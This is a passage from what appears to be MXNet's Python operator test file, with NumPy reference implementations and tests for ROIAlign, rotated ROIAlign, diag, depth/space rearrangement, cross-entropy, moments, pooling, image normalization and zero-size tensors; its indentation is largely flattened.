ly = y - T(y_low)
lx = x - T(x_low)
hy = T(1.0) - ly
hx = T(1.0) - lx
v1 = bottom[y_low, x_low]
v2 = bottom[y_low, x_high]
v3 = bottom[y_high, x_low]
v4 = bottom[y_high, x_high]
w1 = hy * hx
w2 = hy * lx
w3 = ly * hx
w4 = ly * lx
assert_same_dtype(w1.dtype, T)
assert_same_dtype(w2.dtype, T)
assert_same_dtype(w3.dtype, T)
assert_same_dtype(w4.dtype, T)
val = w1 * v1 + w2 * v2 + w3 * v3 + w4 * v4
assert_same_dtype(val.dtype, T)
grad = [(y_low, x_low, w1), (y_low, x_high, w2),
(y_high, x_low, w3), (y_high, x_high, w4)
]
return val, grad
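    # roialign_forward_backward is a pure-NumPy reference implementation used to
    # validate both the forward output and the input gradient of ROIAlign; dy is
    # the incoming output gradient.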
def roialign_forward_backward(data, rois, pooled_size, spatial_scale, sampling_ratio,
position_sensitive, dy):
N, C, H, W = data.shape
R = rois.shape[0]
PH, PW = pooled_size
assert rois.ndim == 2,\
ValueError(
'The ndim of rois should be 2 rather than %d' % rois.ndim)
assert rois.shape[1] == 5,\
ValueError(
'The length of the axis 1 of rois should be 5 rather than %d' % rois.shape[1])
assert_same_dtype(data.dtype, T)
assert_same_dtype(rois.dtype, T)
C_out = C // PH // PW if position_sensitive else C
out = np.zeros((R, C_out, PH, PW), dtype=T)
dx = np.zeros_like(data)
drois = np.zeros_like(rois)
for r in range(R):
batch_ind = int(rois[r, 0])
sw, sh, ew, eh = rois[r, 1:5] * T(spatial_scale)
roi_w = T(max(ew - sw, 1.0))
roi_h = T(max(eh - sh, 1.0))
bin_h = roi_h / T(PH)
bin_w = roi_w / T(PW)
bdata = data[batch_ind]
if sampling_ratio > 0:
roi_bin_grid_h = roi_bin_grid_w = sampling_ratio
else:
roi_bin_grid_h = int(np.ceil(roi_h / T(PH)))
roi_bin_grid_w = int(np.ceil(roi_w / T(PW)))
count = T(roi_bin_grid_h * roi_bin_grid_w)
for c in range(C_out):
for ph in range(PH):
for pw in range(PW):
val = T(0.0)
c_in = c * PH * PW + ph * PW + pw if position_sensitive else c
for iy in range(roi_bin_grid_h):
y = sh + T(ph) * bin_h + (T(iy) + T(0.5)) * \
bin_h / T(roi_bin_grid_h)
for ix in range(roi_bin_grid_w):
x = sw + T(pw) * bin_w + (T(ix) + T(0.5)) * \
bin_w / T(roi_bin_grid_w)
v, g = bilinear_interpolate(
bdata[c_in], H, W, y, x)
assert_same_dtype(v.dtype, T)
val += v
# compute grad
for qy, qx, qw in g:
assert_same_dtype(qw.dtype, T)
dx[batch_ind, c_in, qy, qx] += dy[r,
c, ph, pw] * qw / count
out[r, c, ph, pw] = val / count
assert_same_dtype(out.dtype, T)
return out, [dx, drois]
def test_roi_align_value(sampling_ratio=0, position_sensitive=False):
ctx = default_context()
dtype = np.float32
dlen = 224
N, C, H, W = 5, 3, 16, 16
R = 7
pooled_size = (3, 4)
C = C * pooled_size[0] * pooled_size[1] if position_sensitive else C
spatial_scale = H * 1.0 / dlen
data = mx.nd.array(
np.arange(N * C * W * H).reshape((N, C, H, W)), ctx=ctx, dtype=dtype)
center_xy = mx.nd.random.uniform(0, dlen, (R, 2), ctx=ctx, dtype=dtype)
wh = mx.nd.random.uniform(0, dlen, (R, 2), ctx=ctx, dtype=dtype)
batch_ind = mx.nd.array(np.random.randint(0, N, size=(R, 1)), ctx=ctx)
pos = mx.nd.concat(center_xy - wh / 2, center_xy + wh / 2, dim=1)
rois = mx.nd.concat(batch_ind, pos, dim=1)
data.attach_grad()
rois.attach_grad()
with mx.autograd.record():
output = mx.nd.contrib.ROIAlign(data, rois, pooled_size=pooled_size,
spatial_scale=spatial_scale, sample_ratio=sampling_ratio,
position_sensitive=position_sensitive)
C_out = C // pooled_size[0] // pooled_size[1] if position_sensitive else C
dy = mx.nd.random.uniform(-1, 1, (R, C_out) +
pooled_size, ctx=ctx, dtype=dtype)
output.backward(dy)
real_output, [dx, drois] = roialign_forward_backward(data.asnumpy(), rois.asnumpy(), pooled_size,
spatial_scale, sampling_ratio,
position_sensitive, dy.asnumpy())
assert_almost_equal(output.asnumpy(), real_output, atol=1e-3)
assert_almost_equal(data.grad.asnumpy(), dx, atol=1e-3)
assert_almost_equal(rois.grad.asnumpy(), drois, atol=1e-3)
# modified from test_roipooling()
def test_roi_align_autograd(sampling_ratio=0):
ctx = default_context()
data = mx.symbol.Variable(name='data')
rois = mx.symbol.Variable(name='rois')
test = mx.symbol.contrib.ROIAlign(data=data, rois=rois, pooled_size=(4, 4), spatial_scale=1,
sample_ratio=sampling_ratio)
x1 = np.random.rand(4, 1, 12, 12).astype('float64')
x2 = np.array([[0, 1.1, 1.1, 6.2, 6.2], [2, 6.1, 2.1, 8.2, 11.2],
[1, 3.1, 1.1, 5.2, 10.2]], dtype='float64')
check_numeric_gradient(sym=test, location=[x1, x2],
grad_nodes={'data': 'write', 'rois': 'null'},
numeric_eps=1e-4, rtol=1e-1, atol=1e-4, ctx=ctx)
check_numeric_gradient(sym=test, location=[x1, x2],
grad_nodes={'data': 'add', 'rois': 'null'},
numeric_eps=1e-4, rtol=1e-1, atol=1e-4, ctx=ctx)
test_roi_align_value()
test_roi_align_value(sampling_ratio=2)
test_roi_align_value(position_sensitive=True)
test_roi_align_autograd()
@with_seed()
def test_op_rroi_align():
T = np.float32
def assert_same_dtype(dtype_a, dtype_b):
'''
        Assert that the two data types are the same
Parameters
----------
dtype_a, dtype_b: type
Input data types to compare
'''
assert dtype_a == dtype_b,\
TypeError('Unmatched data types: %s vs %s' % (dtype_a, dtype_b))
def bilinear_interpolate(bottom, height, width, y, x):
if y < -1.0 or y > height or x < -1.0 or x > width:
return T(0.0)
x = T(max(0.0, x))
y = T(max(0.0, y))
x_low = int(x)
y_low = int(y)
if x_low >= width - 1:
x_low = x_high = width - 1
x = T(x_low)
else:
x_high = x_low + 1
if y_low >= height - 1:
y_low = y_high = height - 1
y = T(y_low)
else:
y_high = y_low + 1
ly = y - T(y_low)
lx = x - T(x_low)
hy = T(1.0) - ly
hx = T(1.0) - lx
v1 = bottom[y_low, x_low]
v2 = bottom[y_low, x_high]
v3 = bottom[y_high, x_low]
v4 = bottom[y_high, x_high]
w1 = hy * hx
w2 = hy * lx
w3 = ly * hx
w4 = ly * lx
assert_same_dtype(w1.dtype, T)
assert_same_dtype(w2.dtype, T)
assert_same_dtype(w3.dtype, T)
assert_same_dtype(w4.dtype, T)
val = w1 * v1 + w2 * v2 + w3 * v3 + w4 * v4
assert_same_dtype(val.dtype, T)
return val
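    # rroialign_forward is a NumPy reference for the rotated ROIAlign forward
    # pass: each roi is (batch_idx, cx, cy, w, h, theta in degrees) and every
    # sampling point is rotated by theta before bilinear interpolation.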
def rroialign_forward(data, rois, pooled_size, spatial_scale, sampling_ratio):
N, C, H, W = data.shape
R = rois.shape[0]
PH, PW = pooled_size
assert rois.ndim == 2,\
ValueError(
'The ndim of rois should be 2 rather than %d' % rois.ndim)
assert rois.shape[1] == 6,\
ValueError(
'The length of the axis 1 of rois should be 6 rather than %d' % rois.shape[1])
assert_same_dtype(data.dtype, T)
assert_same_dtype(rois.dtype, T)
out = np.zeros((R, C, PH, PW), dtype=T)
for r in range(R):
batch_ind = int(rois[r, 0])
roi_center_w, roi_center_h, roi_w, roi_h = rois[r, 1:5] * T(spatial_scale)
roi_theta = T(rois[r,5] * np.pi / 180.0)
roi_w = T(max(roi_w, 1.0))
roi_h = T(max(roi_h, 1.0))
bin_h = roi_h / T(PH)
bin_w = roi_w / T(PW)
bdata = data[batch_ind]
if sampling_ratio > 0:
roi_bin_grid_h = roi_bin_grid_w = sampling_ratio
else:
roi_bin_grid_h = int(np.ceil(roi_h / T(PH)))
roi_bin_grid_w = int(np.ceil(roi_w / T(PW)))
count = T(roi_bin_grid_h * roi_bin_grid_w)
roi_start_h = T(-roi_h / 2.0)
roi_start_w = T(-roi_w / 2.0)
for c in range(C):
for ph in range(PH):
for pw in range(PW):
val = T(0.0)
for iy in range(roi_bin_grid_h):
yy = roi_start_h + T(ph) * bin_h + (T(iy) + T(0.5)) * \
bin_h / T(roi_bin_grid_h)
for ix in range(roi_bin_grid_w):
xx = roi_start_w + T(pw) * bin_w + (T(ix) + T(0.5)) * \
bin_w / T(roi_bin_grid_w)
x = xx * np.cos(roi_theta, dtype=T) + yy * np.sin(roi_theta, dtype=T) + roi_center_w
y = yy * np.cos(roi_theta, dtype=T) - xx * np.sin(roi_theta, dtype=T) + roi_center_h
v = bilinear_interpolate(
bdata[c], H, W, y, x)
assert_same_dtype(v.dtype, T)
val += v
out[r, c, ph, pw] = val / count
assert_same_dtype(out.dtype, T)
return out
def test_rroi_align_value(sampling_ratio=-1):
ctx = default_context()
if ctx.device_type == 'gpu':
print('skipped testing rroi align for gpu since it is not supported yet')
return
dtype = np.float32
dlen = 224
N, C, H, W = 5, 3, 16, 16
R = 7
pooled_size = (3, 4)
spatial_scale = H * 1.0 / dlen
data = mx.nd.array(
np.arange(N * C * W * H).reshape((N, C, H, W)), ctx=ctx, dtype=dtype)
center_xy = mx.nd.random.uniform(0, dlen, (R, 2), ctx=ctx, dtype=dtype)
wh = mx.nd.random.uniform(0, dlen, (R, 2), ctx=ctx, dtype=dtype)
theta = mx.nd.random.uniform(0, 180, (R,1), ctx=ctx, dtype=dtype)
batch_ind = mx.nd.array(np.random.randint(0, N, size=(R, 1)), ctx=ctx)
pos = mx.nd.concat(center_xy, wh, theta, dim=1)
rois = mx.nd.concat(batch_ind, pos, dim=1)
output = mx.nd.contrib.RROIAlign(data, rois, pooled_size=pooled_size,
spatial_scale=spatial_scale, sampling_ratio=sampling_ratio)
real_output = rroialign_forward(data.asnumpy(), rois.asnumpy(), pooled_size,
spatial_scale, sampling_ratio)
assert_almost_equal(output.asnumpy(), real_output, atol=1e-3)
test_rroi_align_value()
test_rroi_align_value(sampling_ratio=2)
@with_seed()
def test_diag():
# Test 2d input
h = np.random.randint(2,9)
w = np.random.randint(2,9)
a_np = np.random.random((h, w)).astype(np.float32)
a = mx.nd.array(a_np).astype('float32')
# k == 0
r = mx.nd.diag(a)
assert_almost_equal(r.asnumpy(), np.diag(a_np))
# k == 1
k = 1
r = mx.nd.diag(a, k=k)
assert_almost_equal(r.asnumpy(), np.diag(a_np, k=k))
# k == -1
k = -1
r = mx.nd.diag(a, k=k)
assert_almost_equal(r.asnumpy(), np.diag(a_np, k=k))
# random k
k = np.random.randint(-min(h,w) + 1, min(h,w))
r = mx.nd.diag(a, k=k)
assert_almost_equal(r.asnumpy(), np.diag(a_np, k=k))
# invalid k
k = max(h,w) + 1
assertRaises(MXNetError, mx.nd.diag, a, k=k)
# Test 2d backward, k=0
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data)
check_numeric_gradient(diag_sym, [a_np])
# Test 2d backward, k=1
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data, k=1)
check_numeric_gradient(diag_sym, [a_np])
# Test 2d backward, k=-1
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data, k=-1)
check_numeric_gradient(diag_sym, [a_np])
    # Test 1d input
d = np.random.randint(2,9)
a_np = np.random.random((d))
a = mx.nd.array(a_np)
# k is random
k = np.random.randint(-d,d)
r = mx.nd.diag(a, k=k)
assert_almost_equal(r.asnumpy(), np.diag(a_np, k=k))
    # Test 1d backward, k=0
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data)
check_numeric_gradient(diag_sym, [a_np])
    # Test 1d backward, k=1
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data, k=1)
check_numeric_gradient(diag_sym, [a_np])
    # Test 1d backward, k=-1
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data, k=-1)
check_numeric_gradient(diag_sym, [a_np])
# Test 4d input
x1 = np.random.randint(3,9)
x2 = np.random.randint(3,9)
x3 = np.random.randint(3,9)
x4 = np.random.randint(3,9)
a_np = np.random.random((x1, x2, x3, x4)).astype(np.float32)
a = mx.nd.array(a_np).astype('float32')
# k = 0, axis1=0, axis2=1
r = mx.nd.diag(data=a, k=0, axis1=0, axis2=1)
assert_almost_equal(r.asnumpy(), np.diagonal(a_np, offset=0, axis1=0, axis2=1))
# k = 1, axis1=1, axis2=0
r = mx.nd.diag(data=a, k=1, axis1=1, axis2=0)
assert_almost_equal(r.asnumpy(), np.diagonal(a_np, offset=1, axis1=1, axis2=0))
    # k = -1, axis1=1, axis2=3
r = mx.nd.diag(data=a, k=-1, axis1=1, axis2=3)
assert_almost_equal(r.asnumpy(), np.diagonal(a_np, offset=-1, axis1=1, axis2=3))
# k = 2, axis1=-2, axis2=0
r = mx.nd.diag(data=a, k=2, axis1=-2, axis2=0)
assert_almost_equal(r.asnumpy(), np.diagonal(a_np, offset=2, axis1=-2, axis2=0))
# Test 4d backward, k=0, axis1=3, axis2=0
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data, k=0, axis1=3, axis2=0)
check_numeric_gradient(diag_sym, [a_np])
# Test 4d backward, k=1, axis1=1, axis2=2
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data, k=1, axis1=1, axis2=2)
check_numeric_gradient(diag_sym, [a_np])
# Test 4d backward, k=-1, axis1=2, axis2=0
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data, k=-1, axis1=2, axis2=0)
check_numeric_gradient(diag_sym, [a_np])
# Test 4d backward, k=-2, axis1=1, axis2=-1
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data, k=-2, axis1=1, axis2=-1)
check_numeric_gradient(diag_sym, [a_np])
@with_seed()
def test_depthtospace():
def f(x, blocksize):
b, c, h, w = x.shape[0], x.shape[1], x.shape[2], x.shape[3]
tmp = np.reshape(x, [b, blocksize, blocksize, c // (blocksize**2), h, w])
tmp = np.transpose(tmp, [0, 3, 4, 1, 5, 2])
y = np.reshape(tmp, [b, c // (blocksize**2), h * blocksize, w * blocksize])
return y
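    # f is a NumPy reference for depth_to_space: (n, c, h, w) with c divisible
    # by blocksize**2 maps to (n, c // blocksize**2, h * blocksize, w * blocksize).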
block = random.randint(2, 4)
rand_mul1 = random.randint(1, 4)
n = random.randint(1, 5)
c = block * block * rand_mul1
h = random.randint(1, 5)
w = random.randint(1, 5)
shape_inp = (n, c, h, w)
data = rand_ndarray(shape_inp, 'default')
data_np = data.asnumpy()
expected = f(data_np, block)
output = mx.nd.depth_to_space(data, block)
assert_almost_equal(output.asnumpy(), expected, atol=1e-3, rtol=1e-3)
shape_out = (n, c // (block ** 2), h * block, w * block)
data = mx.sym.Variable('data')
dts_sym = mx.sym.depth_to_space(data, block)
check_numeric_gradient(dts_sym, [np.ones(shape_inp)])
check_symbolic_forward(dts_sym, [data_np], [expected])
check_symbolic_backward(dts_sym, [data_np], [np.ones(shape_out)], [np.ones(shape_inp)])
def test_invalid_depth_dim():
invalid_shape_inp = (n, block - 1, h, w)
data = rand_ndarray(invalid_shape_inp, 'default')
assertRaises(MXNetError, mx.nd.depth_to_space, data, block)
def test_invalid_space_dim():
invalid_shape_inp = (n, block ** 2, 0, block + 1)
data = rand_ndarray(invalid_shape_inp, 'default')
assertRaises(MXNetError, mx.nd.depth_to_space, data, block)
def test_invalid_block_size():
block = 0
invalid_shape_inp = (n , c, h, w)
data = rand_ndarray(invalid_shape_inp, 'default')
assertRaises(MXNetError, mx.nd.depth_to_space, data, block)
test_invalid_depth_dim()
test_invalid_space_dim()
test_invalid_block_size()
@with_seed()
def test_spacetodepth():
def f(x, blocksize):
b, c, h, w = x.shape[0], x.shape[1], x.shape[2], x.shape[3]
tmp = np.reshape(x, [b, c, h // blocksize, blocksize, w // blocksize, blocksize])
tmp = np.transpose(tmp, [0, 3, 5, 1, 2, 4])
y = np.reshape(tmp, [b, c * (blocksize**2), h // blocksize, w // blocksize])
return y
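    # f is a NumPy reference for space_to_depth, the inverse rearrangement:
    # (n, c, h, w) maps to (n, c * blocksize**2, h // blocksize, w // blocksize).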
block = random.randint(2, 4)
rand_mul1 = random.randint(1, 4)
rand_mul2 = random.randint(1, 4)
n = random.randint(1, 5)
c = random.randint(1, 5)
h = block * rand_mul1
w = block * rand_mul2
shape_inp = (n, c, h, w)
data = rand_ndarray(shape_inp, 'default')
data_np = data.asnumpy()
expected = f(data_np, block)
output = mx.nd.space_to_depth(data, block)
assert_almost_equal(output.asnumpy(), expected, atol=1e-3, rtol=1e-3)
shape_out = (n, c * (block ** 2), h // block, w // block)
data = mx.sym.Variable('data')
dts_sym = mx.sym.space_to_depth(data, block)
check_numeric_gradient(dts_sym, [np.ones(shape_inp)])
check_symbolic_forward(dts_sym, [data_np], [expected])
check_symbolic_backward(dts_sym, [data_np], [np.ones(shape_out)], [np.ones(shape_inp)])
def test_invalid_space_dim():
invalid_shape_inp = (n , c, block - 1, w)
data = rand_ndarray(invalid_shape_inp, 'default')
assertRaises(MXNetError, mx.nd.space_to_depth, data, block)
def test_invalid_block_size():
block = 0
invalid_shape_inp = (n, c, h, w)
data = rand_ndarray(invalid_shape_inp, 'default')
assertRaises(MXNetError, mx.nd.space_to_depth, data, block)
def test_invalid_depth_dim():
invalid_shape_inp = (n, 0, h, w)
data = rand_ndarray(invalid_shape_inp, 'default')
assertRaises(MXNetError, mx.nd.space_to_depth, data, block)
test_invalid_space_dim()
test_invalid_block_size()
test_invalid_depth_dim()
@with_seed()
def test_softmax_cross_entropy():
def f_sm_ce(data, label):
return np.sum(-np.log(data) * label)
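    # f_sm_ce is the reference loss: -sum(log(softmax) * one_hot_label), summed
    # over the whole batch, matching the scalar output of softmax_cross_entropy.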
data = mx.sym.Variable('data')
label = mx.sym.Variable('label')
sym = mx.sym.softmax_cross_entropy(data=data, label=label)
num_labels = random.randint(100, 200)
batch_size = random.randint(100, 200)
np_data = rand_ndarray((batch_size, num_labels), stype='default').asnumpy()
np_sm = np_softmax(np_data)
np_label = np.random.randint(0, num_labels, (batch_size, ))
np_one_hot_label = np.zeros((batch_size, num_labels))
np_one_hot_label[np.arange(batch_size), np_label] = 1.
check_symbolic_forward(sym, {'data' : np_data, 'label' : np_label}, [np.array([f_sm_ce(np_sm, np_one_hot_label)])], rtol=1e-3, atol=1e-5)
@with_seed()
def test_split_v2():
dim = random.randint(2, 6)
shape = rand_shape_nd(dim)
axis = random.randint(-dim, dim-1)
axis_size = shape[axis]
samples = random.randint(0, axis_size - 1)
indices = sorted(random.sample([i for i in range(1, axis_size)], samples))
indices = tuple(indices)
mx_data = rand_ndarray(shape)
np_data = mx_data.asnumpy()
np_out = np.split(np_data, indices_or_sections=indices, axis=axis)
data = mx.sym.Variable("data")
sym = mx.sym.split_v2(data, indices_or_sections=indices, axis=axis)
check_symbolic_forward(sym, {"data": mx_data}, np_out, rtol=1e-3, atol=1e-5)
out_grad = [np.ones(arr.shape) for arr in np_out]
check_symbolic_backward(sym, {"data": mx_data}, out_grad, [np.concatenate(out_grad, axis=axis)])
@with_seed()
def test_moments():
dim = random.randint(2, 5)
shape = rand_shape_nd(dim, dim=5)
axes = [i for i in range(dim)]
test_dims = random.sample(axes, random.randint(1, dim))
test_axes = tuple(sorted(test_dims))
np_a = np.random.uniform(-1.0, 1.0, shape)
a = mx.nd.array(np_a)
for keepdims in [True, False]:
eps = 1e-3
np_a[abs(np_a) < eps] = 2 * eps
np_mean = np.mean(np_a, axis=test_axes, keepdims=keepdims)
np_var = np.var(np_a, axis=test_axes, keepdims=keepdims)
mx_mean, mx_var = mx.nd.moments(a, keepdims=keepdims, axes=test_axes)
N = np_a.size / np_mean.size
mx_sym = mx.sym.Variable("data")
mx_moments = mx.sym.moments(mx_sym, axes=test_axes, keepdims=keepdims)
mx_test_sym = mx.sym.elemwise_add(mx_moments[0], mx_moments[1])
if len(np_mean.shape) == 0:
np_mean = np_mean.reshape(mx_mean.shape)
np_var = np_var.reshape(mx_var.shape)
assert np_mean.shape == mx_mean.shape
assert np_var.shape == mx_var.shape
check_symbolic_forward(mx_test_sym, [np_a], [np_mean + np_var], rtol=1e-3, atol=1e-5)
check_numeric_gradient(mx_test_sym, [np_a], numeric_eps=eps, rtol=1e-2, atol=2e-4)
@with_seed()
def test_invalid_kernel_size():
invalid_kernel_size = 28
assert_exception(
mx.nd.Correlation,
MXNetError,
mx.nd.array(np.random.rand(1, 1, 28, 28)),
mx.nd.array(np.random.rand(1, 1, 28, 28)),
kernel_size=invalid_kernel_size)
@with_seed()
def test_valid_kernel_size():
valid_kernel_size = 9
mx.nd.Correlation(
mx.nd.array(np.random.rand(1, 1, 28, 28)),
mx.nd.array(np.random.rand(1, 1, 28, 28)),
kernel_size=valid_kernel_size)
@with_seed()
def test_valid_max_pooling_pad_type_same():
import math
input_data = mx.nd.array(np.random.rand(1,1,10))
stride = 2
kernel = 2
output_data=mx.nd.Pooling(
input_data,
kernel=kernel,
stride=stride,
pad=(0,0,0),
pool_type='max',
name='pooling',
pooling_convention="same")
assert(math.ceil(input_data.shape[2]/stride) == output_data.shape[2])
@with_seed()
def test_invalid_max_pooling_pad_type_same():
import math
input_data = mx.nd.array(np.random.rand(1,1,10))
stride = 2
kernel = 2
pad = 2
assert_exception(
mx.nd.Pooling,
MXNetError,
input_data,
stride=stride,
kernel=kernel,
pad=pad,
pool_type='max',
name='pooling',
pooling_convention="same")
@with_seed()
def test_image_normalize():
# Part 1 - Test 3D input with 3D mean/std
shape_3d = (3, 28, 28)
mean = (0, 1, 2)
std = (3, 2, 1)
data_in_3d = mx.nd.random.uniform(0, 1, shape_3d)
data_expected_3d = data_in_3d.asnumpy()
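    # Note: chained [:] indexing is a no-op on ndarrays, so expressions like
    # data_expected_3d[:][:][c] below simply select channel c along axis 0.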
data_expected_3d[:][:][0] = data_expected_3d[:][:][0] / 3.0
data_expected_3d[:][:][1] = (data_expected_3d[:][:][1] - 1.0) / 2.0
data_expected_3d[:][:][2] = data_expected_3d[:][:][2] - 2.0
data = mx.symbol.Variable('data')
img_norm_sym = mx.sym.image.normalize(data=data, mean=mean, std=std)
# check forward
check_symbolic_forward(img_norm_sym, [data_in_3d], [data_expected_3d],
rtol=1e-5, atol=1e-5)
# Gradient is 1/std_dev
grad_expected_3d = np.ones(shape_3d)
grad_expected_3d[:][:][0] = 1 / 3.0
grad_expected_3d[:][:][1] = 1 / 2.0
grad_expected_3d[:][:][2] = 1 / 1.0
# check backward
check_symbolic_backward(img_norm_sym, location=[data_in_3d], out_grads=[mx.nd.ones(shape_3d)],
expected=[grad_expected_3d], rtol=1e-5, atol=1e-5)
# check backward using finite difference
check_numeric_gradient(img_norm_sym, [data_in_3d], atol=0.001)
# Part 2 - Test 4D input with 3D mean/std
shape_4d = (2, 3, 28, 28)
data_in_4d = mx.nd.random.uniform(0, 1, shape_4d)
data_expected_4d = data_in_4d.asnumpy()
data_expected_4d[0][:][:][0] = data_expected_4d[0][:][:][0] / 3.0
data_expected_4d[0][:][:][1] = (data_expected_4d[0][:][:][1] - 1.0) / 2.0
data_expected_4d[0][:][:][2] = data_expected_4d[0][:][:][2] - 2.0
data_expected_4d[1][:][:][0] = data_expected_4d[1][:][:][0] / 3.0
data_expected_4d[1][:][:][1] = (data_expected_4d[1][:][:][1] - 1.0) / 2.0
data_expected_4d[1][:][:][2] = data_expected_4d[1][:][:][2] - 2.0
# check forward
check_symbolic_forward(img_norm_sym, [data_in_4d], [data_expected_4d],
rtol=1e-5, atol=1e-5)
# Gradient is 1/std_dev
grad_expected_4d = np.ones(shape_4d)
grad_expected_4d[0][:][:][0] = 1 / 3.0
grad_expected_4d[0][:][:][1] = 1 / 2.0
grad_expected_4d[0][:][:][2] = 1 / 1.0
grad_expected_4d[1][:][:][0] = 1 / 3.0
grad_expected_4d[1][:][:][1] = 1 / 2.0
grad_expected_4d[1][:][:][2] = 1 / 1.0
# check backward
check_symbolic_backward(img_norm_sym, location=[data_in_4d], out_grads=[mx.nd.ones(shape_4d)],
expected=[grad_expected_4d], rtol=1e-5, atol=1e-5)
# check backward using finite difference
check_numeric_gradient(img_norm_sym, [data_in_4d], atol=0.001)
# Part 3 - Test 3D input with scalar mean/std
shape_3d = (3, 28, 28)
mean = 1.0
std = 2.0
data_in_3d = mx.nd.random.uniform(0, 1, shape_3d)
data_expected_3d = data_in_3d.asnumpy()
data_expected_3d[:][:][:] = (data_expected_3d[:][:][:] - 1.0) / 2.0
data = mx.symbol.Variable('data')
img_norm_sym = mx.sym.image.normalize(data=data, mean=mean, std=std)
# check forward
check_symbolic_forward(img_norm_sym, [data_in_3d], [data_expected_3d],
rtol=1e-5, atol=1e-5)
# Gradient is 1/std_dev
grad_expected_3d = np.ones(shape_3d)
grad_expected_3d[:][:][:] = 1 / 2.0
# check backward
check_symbolic_backward(img_norm_sym, location=[data_in_3d], out_grads=[mx.nd.ones(shape_3d)],
expected=[grad_expected_3d], rtol=1e-5, atol=1e-5)
# check backward using finite difference
check_numeric_gradient(img_norm_sym, [data_in_3d], atol=0.001)
# Part 4 - Test 4D input with scalar mean/std
shape_4d = (2, 3, 28, 28)
data_in_4d = mx.nd.random.uniform(0, 1, shape_4d)
data_expected_4d = data_in_4d.asnumpy()
data_expected_4d[:][:][:][:] = (data_expected_4d[:][:][:][:] - 1.0) / 2.0
# check forward
check_symbolic_forward(img_norm_sym, [data_in_4d], [data_expected_4d],
rtol=1e-5, atol=1e-5)
# Gradient is 1/std_dev
grad_expected_4d = np.ones(shape_4d)
grad_expected_4d[:][:][:][:] = 1 / 2.0
# check backward
check_symbolic_backward(img_norm_sym, location=[data_in_4d], out_grads=[mx.nd.ones(shape_4d)],
expected=[grad_expected_4d], rtol=1e-5, atol=1e-5)
# check backward using finite difference
check_numeric_gradient(img_norm_sym, [data_in_4d], atol=0.001)
@with_seed()
def test_index_array():
def test_index_array_default():
for shape in [(10,), (7, 5, 29), (5, 7, 11, 13, 17, 19)]:
data = mx.symbol.Variable("data")
index_array = mx.sym.contrib.index_array(data)
input_array = np.ones(shape)
mgrid = np.mgrid[tuple(slice(0, x) for x in shape)]
expected = np.stack(mgrid, axis=-1)
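            # expected[i, j, ..., d] holds the d-th coordinate of each element,
            # i.e. index_array returns every element's own N-d index.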
check_symbolic_forward(index_array, [input_array], [expected])
check_symbolic_backward(index_array, [input_array], [np.ones(expected.shape)], [np.zeros_like(input_array)])
@mx.use_np_shape
def test_index_array_default_zero_dim():
data = mx.symbol.Variable("data")
index_array = mx.sym.contrib.index_array(data)
input_array = np.ones(())
expected = np.zeros((0,))
check_symbolic_forward(index_array, [input_array], [expected])
check_symbolic_backward(index_array, [input_array], [np.ones(expected.shape)], [np.zeros_like(input_array)])
@mx.use_np_shape
def test_index_array_default_zero_size():
data = mx.symbol.Variable("data")
index_array = mx.sym.contrib.index_array(data)
input_array = np.ones((0, 0, 0))
expected = np.zeros((0, 0, 0, 3))
check_symbolic_forward(index_array, [input_array], [expected])
check_symbolic_backward(index_array, [input_array], [np.ones(expected.shape)], [np.zeros_like(input_array)])
def test_index_array_select_axes():
shape = (5, 7, 11, 13, 17, 19)
for axes in [(3,), (4, 1), (5, 1, 3), (-1,), (-5, -1, -3)]:
data = mx.symbol.Variable("data")
index_array = mx.sym.contrib.index_array(data, axes=axes)
input_array = np.ones(shape)
mgrid = np.mgrid[tuple(slice(0, x) for x in shape)]
expected = np.stack(mgrid, axis=-1)[..., axes]
check_symbolic_forward(index_array, [input_array], [expected])
check_symbolic_backward(index_array, [input_array], [np.ones(expected.shape)], [np.zeros_like(input_array)])
@mx.use_np_shape
def test_index_array_select_axes_zero_size():
data = mx.symbol.Variable("data")
index_array = mx.sym.contrib.index_array(data, axes=(2, 1))
input_array = np.ones((0, 0, 0, 0))
expected = np.zeros((0, 0, 2))
check_symbolic_forward(index_array, [input_array], [expected])
check_symbolic_backward(index_array, [input_array], [np.ones(expected.shape)], [np.zeros_like(input_array)])
test_index_array_default()
test_index_array_default_zero_dim()
test_index_array_default_zero_size()
test_index_array_select_axes()
test_index_array_select_axes_zero_size()
@with_seed()
def test_scalar_tensor_creation():
assertRaises(MXNetError, mx.nd.zeros, shape=())
assertRaises(MXNetError, mx.nd.ones, shape=())
with mx.np_shape():
data_mx = mx.nd.ones(shape=())
data_np = np.ones((), dtype=data_mx.dtype)
assert same(data_mx.asnumpy(), data_np)
@with_seed()
def test_zero_size_tensor_creation():
assertRaises(MXNetError, mx.nd.zeros, shape=(0, 1, 3, 0))
assertRaises(MXNetError, mx.nd.ones, shape=(0, 1, 3, 0))
with mx.np_shape():
data_mx = mx.nd.ones(shape=(0, 1, 0, 4))
data_np = np.ones(shape=data_mx.shape, dtype=data_mx.dtype)
assert same(data_mx.asnumpy(), data_np)
@with_seed()
def test_concat_with_zero_size_tensor():
with mx.np_shape():
data1 = mx.nd.ones((0, 8, 12))
data2 = mx.nd.ones((3, 8, 12))
data3 = mx.nd.ones((0, 8, 12))
ret = mx.nd.Concat(data1, data2, data3, dim=0)
assert ret.shape == (3, 8, 12)
data1 = mx.nd.ones((0, 3, 10))
data2 = mx.nd.ones((0, 4, 10))
data3 = mx.nd.ones((0, 5, 10))
ret = mx.nd.Concat(data1, data2, data3, dim=1)
assert ret.shape == (0, 12, 10)
@with_seed()
def test_np_shape_decorator():
@mx.use_np_shape
def check_scalar_one():
"""Generate scalar one tensor"""
return mx.nd.ones(shape=())
assert check_scalar_one.__name__ == "check_scalar_one"
assert check_scalar_one.__doc__ == "Generate scalar one tensor"
assert check_scalar_one().shape == ()
for active in [True, False]:
with mx.np_shape(active=active):
assert check_scalar_one.__name__ == "check_scalar_one"
assert check_scalar_one.__doc__ == "Generate scalar one tensor"
assert check_scalar_one().shape == ()
@mx.use_np_shape
def check_concat(shape1, shape2, axis):
data1 = mx.nd.ones(shape1)
data2 = mx.nd.ones(shape2)
